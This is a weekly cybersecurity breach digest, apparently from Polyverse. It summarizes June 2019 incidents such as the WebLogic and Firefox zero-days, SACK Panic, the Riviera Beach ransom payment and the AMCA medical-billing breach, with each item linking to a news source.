Polyverse Weekly Breach Report

breach_report

A snapshot of last week’s reported cybersecurity breaches and vulnerabilities

Oracle WebLogic server

Oracle released an emergency software update to patch a vulnerability in its WebLogic application server. Hackers have already exploited the vulnerability, which is a deserialization issue that enables remote attackers to execute arbitrary code on targeted servers. To read more: https://thehackernews.com/2019/06/oracle-weblogic-vulnerability.html

Venmo

A computer-science student scraped 7m Venmo transactions to demonstrate that many users’ transaction histories can still be easily obtained, in spite of previous criticism of Venmo’s security. The student reportedly wanted to alert users that their accounts should be set to private; Venmo still sets payment visibility to public by default. To read more: https://techcrunch.com/2019/06/16/millions-venmo-transactions-scraped/

SACK Panic

A flaw known as SACK Panic can be exploited to remotely crash systems running Linux kernel versions 2.6.29 and higher. This flaw and three others were discovered by a security researcher at Netflix. To read more: https://www.theregister.co.uk/2019/06/17/linux_tcp_sack_kernel_crash/

IoT devices

New research found that security cameras are hacked more frequently than any other internet-of-things devices, representing 47% of all those that are compromised. The next most vulnerable devices are smart hubs and network-attached storage devices. To read more: https://www.zdnet.com/article/cybersecurity-these-are-the-internet-of-things-devices-that-are-most-targeted-by-hackers/

Twitter

Twitter took down almost 5,000 fake accounts in an effort to rid the platform of government-sponsored accounts that spread propaganda. Most of the fake accounts appeared to be backed by Iran and had tweeted content that, according to Twitter, “benefited the diplomatic and geostrategic views of the Iranian state.” To read more: https://www.infosecurity-magazine.com/news/twitter-shutters-5000-1/

Mermaids UK

Mermaids UK, a British charity that supports gender-diverse and transgender youth, faced a data breach that exposed messages between the charity and parents of transgender children. More than 1,000 pages of confidential emails were leaked in the breach. To read more: https://www.zdnet.com/article/mermaids-transgender-charity-apologizes-for-data-breach/

Oregon State University

Oregon State University announced a data breach that may have exposed information belonging to students and their families. The breach occurred in May, but the university has only now revealed that 636 student records containing personally identifiable information were at risk. To read more: https://www.zdnet.com/article/oregon-state-university-breach-exposed-student-family-data/

WiFi extender

A security researcher found a firmware flaw in a TP-Link Technologies WiFi extender. By altering an HTTP request, a hacker can remotely execute any shell command on the device. To read more: https://www.cyberscoop.com/wi-fi-extenders-remote-code-ibm-xforce/

LinkedIn

The profile of a well-connected, but non-existent, “person” named Katie Jones was removed from LinkedIn. Presented as a Russia and Eurasia fellow at a top think tank, Jones may possibly have been a deepfake created by artificial intelligence in order to spy on LinkedIn members. To read more: https://nakedsecurity.sophos.com/2019/06/17/id-like-to-add-you-to-my-professional-network-of-people-to-spy-on/

Firefox

Mozilla released updates for Firefox to address a critical vulnerability that attackers are actively exploiting. A type-confusion bug enables hackers to take full control of systems running vulnerable versions of the browser. To read more: https://threatpost.com/mozilla-patches-firefox-critical-flaw-under-active-attack/145814/

Firefox redux

Mozilla released its second update to Firefox for the week, this time for a sandboxing vulnerability, which if chained with the type-confusion flaw patched with the first update, enables a remote attacker to execute arbitrary code on victims’ computers. To read more: https://thehackernews.com/2019/06/firefox-0day-vulnerability.html

Check out Have I Been Pwned to see if any of your accounts have been exposed by the above breaches.

 

GandCrab ransomware decryption

Researchers released an updated GandCrab ransomware decryption tool that victims can use to unlock their encrypted files for free. GandCrab has infected more than 1.5m computers. To read more: https://thehackernews.com/2019/06/gandcrab-ransomware-decryption-tool.html

Coinbase

An attack on Coinbase employees attempted to exploit the two vulnerabilities in Firefox that were announced this week. Coinbase reported that its security team detected the Firefox flaws and blocked the attack. Had the attempt been successful, the attacker could have gained access to Coinbase’s backend network to steal funds from the exchange. To read more: https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/

John Deere

This American maker of agricultural machinery distributed USB drives at a conference that were designed to hijack a user’s keyboard and load the company’s official website in the user’s browser. While John Deere did not compromise device security, the method used was similar to that of a malicious attack. To read more: https://www.vice.com/en_us/article/pajv5k/john-deere-promotional-usb-drive-hijacks-your-keyboard

APT Group Hijacking

Symantec found that a Russia-linked hacking group deemed to be an advanced persistent threat hijacked the server of a similar group associated with Iran. This was the first time that Symantec has seen one such group take over another’s infrastructure. The takeover happened when a computer in a Middle Eastern government organization downloaded a variant of Mimikatz, a credential-stealing tool, from a server previously controlled by the Iranian group. To read more: https://www.cyberscoop.com/oilrig-turla-symantec-apt-infrastructure/

Cryptominer

A new cryptomining malware has been gaining persistence on Linux by adding cron jobs to reinfect compromised machines. Attackers download the cryptominer using a malicious Bash script dropped onto a server. To read more: https://www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/

Dell

Some versions of Dell’s SupportAssist utility have a security vulnerability that could enable malicious software to escalate the privileges of bad actors to administrator level. The utility, which runs with system-level privileges to check the health of a system’s hardware and software, insecurely loads DLL files, creating an opening for malware. To read more: https://thehackernews.com/2019/06/dells-supportassist-hacking.html

Riviera Beach

A Florida city agreed to pay a $600,000 ransom to hackers. After Riviera Beach’s computer systems were shut down by the hackers, city records were held hostage for three weeks, during which employees couldn’t access email, emergency dispatchers couldn’t log calls, and workers had to be paid with paper checks. To read more: https://www.washingtonpost.com/business/2019/06/20/florida-city-will-pay-hackers-get-its-computer-systems-back/

Outlook for Android

Microsoft released a patch for its Outlook for Android app that addresses a cross-site scripting vulnerability which enables hackers to execute client-side code on targeted devices. Technical details of the flaw are not yet public. To read more: https://thehackernews.com/2019/06/outlook-app-android.html

NASA

NASA confirmed that its Jet Propulsion Lab was hacked. After targeting an unauthorized Raspberry Pi computer connected to the lab’s servers, hackers were able to move further into NASA’s network. To read more: https://www.forbes.com/sites/daveywinder/2019/06/20/confirmed-nasa-has-been-hacked/#367800abdc62

American Medical Collection Agency

A medical-billing firm that was responsible for a recent data breach that exposed the personal information of 20m Americans filed for bankruptcy. This breach impacted both Quest Diagnostics and LabCorp’s patients. To read more: https://krebsonsecurity.com/2019/06/collections-firm-behind-labcorp-quest-breaches-files-for-bankruptcy/

Want to learn more?

Sign up below and receive these reports and more, directly in your inbox.

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.